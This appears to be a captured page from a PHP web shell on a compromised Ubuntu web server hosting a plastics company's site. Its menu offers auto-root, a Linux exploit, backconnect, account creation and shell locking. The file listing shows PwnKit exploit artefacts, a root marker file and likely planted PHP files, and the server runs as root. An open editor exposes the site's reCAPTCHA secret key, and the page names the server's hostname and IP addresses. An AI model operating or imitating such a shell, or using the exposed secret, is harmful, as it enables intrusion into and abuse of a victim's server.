Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
callegariplasticos /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
blog
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
mail
[ DIR ]
drwxr-xr-x
señalizacion
[ DIR ]
drwxr-xr-x
termoformados
[ DIR ]
drwxr-xr-x
troquelados
[ DIR ]
drwxr-xr-x
varios
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
contact.html
14.18
KB
-rw-r--r--
correctCaptcha.php
881
B
-rw-r--r--
enviar.php
1.25
KB
-rw-r--r--
enviarMailer.php
2.37
KB
-rw-r--r--
favicon.ico
6.89
KB
-rw-r--r--
gracias.html
10.79
KB
-rw-r--r--
index.html
34.73
KB
-rw-r--r--
nosotros.html
12.61
KB
-rw-r--r--
nuestros-productos.html
30.79
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
single-blog.html
19.56
KB
-rw-r--r--
wp-blog-header.php
2.74
KB
-rw-r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : correctCaptcha.php
<?php if (isset($_POST['sumit'])) { $captcha_response = true; $recaptcha = $_POST['g-recaptcha-response']; $url = 'https://www.google.com/recaptcha/api/siteverify'; $data = array( 'secret' => '6LfwQ0AbAAAAACDSvTHfaGbJVl7YPRMt81JaAilO', 'response' => $recaptcha ); $options = array( 'http' => array ( 'method' => 'POST', 'content' => http_build_query($data) ) ); $context = stream_context_create($options); $verify = file_get_contents($url, false, $context); $captcha_success = json_decode($verify); $captcha_response = $captcha_success->success; if ($captcha_response) { echo '<p class="alert alert-success">Procesar datos...</p>'; } else { echo '<p class="alert alert-danger">Debes indicar que no eres un robot.'; } } ?>
Close